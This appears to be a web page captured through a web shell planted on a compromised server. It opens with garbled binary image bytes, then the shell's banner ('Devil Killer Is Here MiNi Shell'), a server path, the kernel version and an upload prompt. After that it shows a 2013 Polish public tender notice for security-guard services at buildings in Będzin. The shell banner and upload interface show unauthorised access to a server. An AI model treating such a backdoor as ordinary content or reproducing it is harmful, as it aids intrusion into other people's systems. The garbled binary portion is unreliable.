JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131205/502260-N-2013.html

<p class="kh_header"><b>Będzin: Usługi ochroniarskie wraz z usługami dodatkowymi dla obiektów:Zadanie Nr 1	-	siedziba MZBM Sp. z o.o. w  Będzinie przy  ul. Krakowskiej 16. Zadanie Nr 2	-	budynek socjalno-mieszkalny zlokalizowany przy ul. Odrodzenia 53 w Będzinie-Łagiszy.
Zadanie Nr 3 - zespół mieszkalnych budynków socjalnych zlokalizowanych w Będzinie 
przy ul. Wolska wraz z przyległym terenem w obrębie ogrodzonej działki (bez budynku i terenów Noclegowni).</b><br>
<b>Numer ogłoszenia: 502260 - 2013; data zamieszczenia: 05.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Budynków Mieszkalnych sp. z o.o. , ul. Krakowska 16, 42-500 Będzin, woj. śląskie, tel. 32 7295221, 7295162, faks 32 7295774.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbm.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego ze 100% udziałem Adm. samorządowej; Zarządzanie na zlecenie..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochroniarskie wraz z usługami dodatkowymi dla obiektów:Zadanie Nr 1	-	siedziba MZBM Sp. z o.o. w  Będzinie przy  ul. Krakowskiej 16. Zadanie Nr 2	-	budynek socjalno-mieszkalny zlokalizowany przy ul. Odrodzenia 53 w Będzinie-Łagiszy.
Zadanie Nr 3 - zespół mieszkalnych budynków socjalnych zlokalizowanych w Będzinie 
przy ul. Wolska wraz z przyległym terenem w obrębie ogrodzonej działki (bez budynku i terenów Noclegowni)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot zamówienia:Zadanie Nr 1 -  przedmiotem zamówienia jest ochrona obiektu siedziby MZBM Sp. z o.o. przy ul. Krakowskiej 16 w Będzinie oraz przynależnego terenu (placu) w godzinach 22:00 ÷ 06:30 w dni robocze oraz całodobowo w soboty, dni wolne od pracy  i  świąteczne,  polegająca na dozorze elektronicznym obiektu poprzez nadajnik radiowy sprzężony z CMA Agencji Ochrony, podglądzie telewizją przemysłową via Internet przez Dyspozytora Agencji Ochrony, bez konieczności fizycznej ochrony, tj. stałego pobytu osób świadczących usługę ochrony na terenie obiektu. Wykonawca będzie zobowiązany do: - otwarcia drzwi wejściowych do budynku w dni robocze o godzinie 06:30, - zamknięcia  drzwi wejściowych do budynku w dni robocze o godzinie 22:00. Sobota w MZBM Sp. z o.o. jest dniem wolnym od pracy. Budynek biurowy dwukondygnacyjny (parter, piętro, poddasze nie użytkowane, podpiwniczony) o pow. użytkowej 438,00 m2, monitorowany na zewnątrz (4 kamery) i wewnątrz (4 kamery) oraz wyposażony w system alarmowy, zlokalizowany jest na ogrodzonym placu o  nieregularnym kształcie o powierzchni 716,00 m2. Ogrodzony plac, zamykana brama wjazdowa na parking, wejście główne do budynku od ul. Krakowskiej (ślusarka aluminiowa, przeszklone), wejście tylne od podwórza (drzwi stalowe).  Zadanie Nr 2  - przedmiotem zamówienia jest ochrona budynku socjalno-mieszkalnego przy ul. Odrodzenia 53 w Będzinie - Łagiszy  oraz przynależnego terenu  w godzinach 16:00 ÷ 07:00 we wszystkie dni tygodnia robocze, wolne od pracy  i  świąteczne. Budynek socjalno-mieszkalny trzykondygnacyjny (parter, 2 piętra, podpiwniczony) o pow. użytkowej 1.558,40 m2  zlokalizowany jest na  działce o powierzchni 4.896,00 m2. W budynku zamieszkuje 31 rodzin, trzy wejścia do budynku, w tym jedno z pochylnią dla  osób niepełnosprawnych. Długość ciągów komunikacyjnych ok. 200,0 mb. Zadanie Nr 3 - przedmiotem zamówienia jest całodobowa ochrona zespołu mieszkalnych budynków socjalnych (bez budynku i terenów Noclegowni) zlokalizowanych przy ul. Wolska w Będzinie oraz przynależnego terenu zwanego w  treści SIWZ OBIEKTEM we wszystkie dni robocze, wolne od pracy i  świąteczne. Ochronie podlega:
a/. 12 mieszkalnych budynków socjalnych, w których znajduje się 77 mieszkań (budynki wolnostojące, parterowe, niepodpiwniczone, mają ten sam obrys zewnętrzny, wejście do każdego z mieszkań bezpośrednio z podcieni), 
b./ urządzony plac zabaw, c./	chodniki o nawierzchni utwardzonej	- 513,10 m2,
d./ chodniki o nawierzchni szutrowej - 774,43 m2, e./	drogi i parkingi 			- 1.470,82 m2, f./ zieleń - 7.731,55 m2. Całkowita powierzchnia działki wynosi 11 847,30m2 [powierzchnia działki 12.600,00 m2 - tereny i budynek Noclegowni 752,70 m2]. Teren ogrodzony z jedną bramą wjazdową, monitorowany poprzez 11 kamer zewnętrznych. Centrala monitoringu znajduje się w budynku Noclegowni, który w niniejszym postępowaniu jest wyłączony 
z usług ochroniarskich.
II. Zakres usług obejmuje: Zadanie Nr 1 - otwarcie drzwi wejściowych do budynku w dni robocze o godzinie 06:30,- zamknięcie drzwi wejściowych do budynku w dni robocze o godzinie 22:00. - monitoring elektroniczny, - dozór elektroniczny poprzez nadajnik radiowy sprzężony z CMA Agencji Ochrony, - podgląd telewizją  przemysłową via Internet przez Dyspozytora Agencji Ochrony, - utrzymanie w stałej gotowości grupy interwencyjnej dysponującej pojazdem, której przeszkoleni członkowie patrolu dotrą do obiektu w możliwie jak najkrótszym czasie (max 10 min.) 	i podejmą działania mające na celu wyeliminowanie czynnika zagrażającego życiu i dobrom materialnym, 
- czynne działanie zmierzające do uniemożliwienia powstania szkód w chronionym obiekcie oraz ich minimalizacji w przypadku pożaru lub innych zdarzeń losowych, w tym powiadamianie Straży  Pożarnej i Zamawiającego, - powiadamianie Zamawiającego i Policji o fakcie kradzieży lub dewastacji, -	przekazywanie osobie wskazanej przez Zamawiającego informacji dotyczącej stanu obiektu.
Uwaga: Ze względu na planowaną zmianę siedziby Spółki w roku 2014 Zamawiający zastrzega sobie prawo do wcześniejszego wypowiedzenia umowy w zakresie Zadania Nr 1. Zadanie Nr 2 - ochrona obiektu i przynależnego do obiektu terenu poprzez stałe czuwanie i przebywanie w wyznaczonym obiekcie i na jego terenie osób świadczących usługę ochrony, w  godzinach 16:00÷07:00, - uniemożliwienie wstępu do ochranianego obiektu osobom postronnym, -	zabezpieczenie i ochronę obiektu przed działaniem na jego terenie osób zakłócających ład i porządek publiczny,
- czynne przeciwdziałanie kradzieży lub dewastacji mienia oraz powiadamianie Policji, 
Straży Miejskiej i Zamawiającego o fakcie kradzieży lub dewastacji, - czynne działanie zmierzające do uniemożliwienia powstania szkód w chronionym obiekcie 
oraz ich minimalizacji w przypadku pożaru lub innych zdarzeń losowych, w  tym powiadamianie Straży  Pożarnej i Zamawiającego, - przekazywanie osobie wskazanej przez Zamawiającego informacji dotyczącej stanu obiektu oraz wszelkich wykrytych awarii i usterek, -	utrzymanie w stałej gotowości grupy interwencyjnej dysponującej pojazdem, której przeszkoleni 	członkowie patrolu dotrą do obiektu w możliwie jak najkrótszym czasie (max 10 min.) i podejmą działania mające na celu wyeliminowanie czynnika zagrażającego życiu i dobrom materialnym, -	wykonywanie innych zadań związanych z zapewnieniem bezpieczeństwa, porządku i ochrony mienia - zleconych przez upoważnione osoby ze strony Zamawiającego, np. kontrola przestrzegania przez mieszkańców budynku i inne osoby przebywające na terenie, obowiązujących przepisów porządkowych, przeciwpożarowych oraz ustawy o wychowaniu w trzeźwości, dodatkowo (prace wykonywane przez osobę świadczącą usługę ochrony lub innego pracownika wyznaczonego przez Wykonawcę): -	zamiatanie ciągów komunikacyjnych, grabienie liści i usuwanie śmieci z trawników na terenie posesji w dni robocze, - odśnieżanie w okresie zimowym ciągów komunikacyjnych, posypywanie  piaskiem w dni robocze, w dni wolne od pracy i świąteczne - jeśli wystąpi taka konieczność. Zadanie Nr 3 -	całodobowa ochrona OBIEKTU, poprzez stałe czuwanie i przebywanie w wyznaczonym OBIEKCIE we wszystkie dni robocze, wolne od pracy i  świąteczne  osób świadczących usługę ochrony, - uniemożliwienie wstępu do ochranianego OBIEKTU osobom postronnym lub osobom bez stosownego upoważnienia wydanego przez Zamawiającego, - zabezpieczenie i ochronę OBIEKTU przed działaniem na jego terenie osób zakłócających ład i porządek publiczny,
- czynne działanie zmierzające do uniemożliwienia powstania szkód w chronionym OBIEKCIE oraz ich minimalizacji w przypadku pożaru lub innych zdarzeń losowych, w tym powiadamianie Straży  Pożarnej  i Zamawiającego, - czynne przeciwdziałanie kradzieży lub dewastacji mienia oraz powiadamianie Policji, Straży Miejskiej i Zamawiającego o fakcie kradzieży lub dewastacji, - przekazywanie osobie wskazanej przez Zamawiającego informacji dotyczącej stanu OBIEKTU oraz wszelkich wykrytych awarii i usterek, -	monitoring elektroniczny, - utrzymanie w stałej gotowości grupy interwencyjnej dysponującej pojazdem, której przeszkoleni członkowie dotrą do OBIEKTU w możliwie jak najkrótszym czasie (max 10 minut) i podejmą działania mające na celu wyeliminowanie czynnika zagrażającego życiu i dobrom materialnym,
- dozór elektroniczny OBIEKTU poprzez nadajnik radiowy sprzężony z CMA Agencji Ochrony, - podgląd OBIEKTU telewizją  przemysłową via Internet przez Dyspozytora Agencji Ochrony, - wykonywanie innych zadań związanych z zapewnieniem na terenie OBIEKTU bezpieczeństwa, porządku i ochrony mienia - zleconych przez upoważnione osoby ze strony Zamawiającego, np. kontrola przestrzegania przez mieszkańców budynków socjalnych i inne osoby przebywające na terenie OBIEKTU obowiązujących przepisów porządkowych, przeciwpożarowych oraz ustawy o wychowaniu w trzeźwości, dodatkowo (prace wykonywane przez osobę świadczącą usługę ochrony lub innego pracownika wyznaczonego przez Wykonawcę):
- zamiatanie ciągów komunikacyjnych i usuwanie śmieci z trawników na terenie 
posesji w dni robocze, -	utrzymanie czystości wokół boksu śmietnika, - zgłaszanie Zamawiającemu potrzeby wywozu z posesji odpadów wielkogabarytowych 
(meble, urządzenia AGD, i inne) zalegających wokół boksu i w boksie śmietnika,
- odśnieżanie w okresie zimowym ciągów komunikacyjnych, posypywanie  piaskiem w dni robocze, - odśnieżanie w okresie zimowym ciągów komunikacyjnych, posypywanie  piaskiem	w dni wolne od pracy i świąteczne - jeśli wystąpi taka konieczność. Czynności dodatkowe stanowić będą niewielki procent w stosunku do czynności ochrony (czas niezbędny ~ max 120 minut w zależności od warunków atmosferycznych). Wykonawca bierze odpowiedzialność za należyte wykonanie czynności dodatkowych. Zaleca się przeprowadzenie wizji na obiektach celem prawidłowego przygotowania oferty. 
III. warunki realizacji: Wykonawca zapewni: - dozór elektroniczny poprzez nadajnik radiowy sprzężony z CMA Agencji Ochrony - dla Zadania Nr 1 i Zadania Nr 3,
- podgląd  telewizją  przemysłową via Internet przez Dyspozytora Agencji Ochrony - dla Zadania Nr 1 i Zadania Nr 3, - niezbędną ilość przeszkolonych osób do ochrony, określoną w oparciu o swoją wiedzę i doświadczenie, posiadających licencję ochrony fizycznej I-go i II-go stopnia - dla Zadania Nr 2 i Zadania Nr 3, -	utrzymanie w stałej gotowości grupy interwencyjnej dysponującej pojazdem, reagującej maksymalnie w ciągu 10 minut od zaistnienia zdarzenia wymagającego interwencji - dla Zadania Nr 1, Zadania Nr 2 i Zadania Nr 3, -	niezbędną ilość osób do utrzymania porządku i czystości na terenie posesji, określoną w oparciu o swoją wiedzę i doświadczenie - dla Zadania Nr 2 i Zadania Nr 3, - Regulamin Ochrony zaakceptowany przez Zamawiającego - dla Zadania Nr 1, Zadania  Nr 2 i Zadania Nr 3.
IV. Zamawiający zapewnia:- nieodpłatnie, pomieszczenie dla pracowników ochrony - dla Zadania Nr 2, - nieodpłatnie, pomieszczenie centrali monitoringu znajdujące się w budynku Noclegowni - dla Zadania Nr 3, -	sprzęt potrzebny do prac porządkowych (miotła, grabie, szufla do odśnieżania) - dla Zadania Nr 2 i Zadania Nr 3, - worki foliowe na śmieci oraz ich wywóz z posesji - dla Zadania Nr  2 i Zadania Nr 3,
- w okresie zimowym dostawę soli i piasku - dla Zadania Nr 2 i Zadania Nr 3..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 90.91.40.00-7, 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony, jeżeli Wykonawca przedłoży:
1. aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r., Nr 145, poz. 1221 ze zm.) w zakresie usług ochrony osób i mienia, określająca zakres i formę prowadzenia tych usług, 2. pozwolenie radiowe zgodnie z art. 143 ustawy z dnia 16 lipca 2004r. - Prawo telekomunikacyjne (Dz.U. 2004 Nr 171, poz.1800 ze zm.) w zakresie sieci dyspozytorskiej i monitoringu systemów alarmowych, 3.	oświadczenie o spełnianiu warunków udziału w postępowaniu,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony, jeżeli Wykonawca przedłoży:
wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w  okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączy dowody, czy zostały wykonane lub są wykonywane należycie. Zamawiający, za wystarczające uzna dwie usługi polegające na świadczeniu usługi ochrony fizycznej osób i mienia w obiektach mieszkalnych lub użyteczności publicznej, w sposób ciągły, przez okres co najmniej 12 miesięcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony, jeżeli  Wykonawca wykaże, że dysponuje licencjonowanymi pracownikami ochrony fizycznej I-go i II-go stopnia załączając do oferty kserokopie stosownych dokumentów oraz złoży oświadczenie o dysponowaniu grupą interwencyjną,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony, jeżeli  Wykonawca dołączy do oferty  kserokopię opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  z sumą gwarancyjną na jedno i wszystkie zdarzenia co najmniej 500.000,00 zł (słownie złotych: pięćset tysięcy) wraz z dowodem potwierdzającym opłacenie wymaganej składki ubezpieczenia, jeśli z przedłożonego dokumentu nie wynika, że składka została opłacona.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony czytelnie formularz oferty na druku lub wg druku stanowiącym 
Załącznik Nr 1 do  SIWZ, 2.oświadczenie o dysponowaniu grupą interwencyjną, której przeszkoleni członkowie patrolu dotrą do obiektów w możliwie jak najkrótszym czasie - maksymalnie 10 minut oraz zapewnieniu dozoru elektronicznego poprzez nadajnik radiowy sprzężony z CMA Agencji Ochrony i podglądu OBIEKTU TV  przemysłową via Internet przez Dyspozytora Agencji Ochrony na druku lub wg druku 
stanowiącym Załącznik Nr 7 do  SIWZ. 3. Upoważnienie (pełnomocnictwo) uprawniające osobę/ osoby do występowania w imieniu Wykonawcy, o ile nie wynika ono z dokumentów załączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień umowy w stosunku  do treści oferty w następujących przypadkach: a) w przypadku zmiany podatku VAT. Zmiana ta następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę VAT, b)	w przypadku wystąpienia siły wyższej, która zaistniała niezależnie od woli stron. Za przypadki siły wyższej uważa się wszelkie nieznane stronom w chwili zawierania umowy zdarzenia, zaistniałe niezależnie od woli stron, na których zaistnienie strony nie miały żadnego wpływu. Zmiana umowy będzie wymagała zachowania formy pisemnej pod rygorem nieważności.</p>
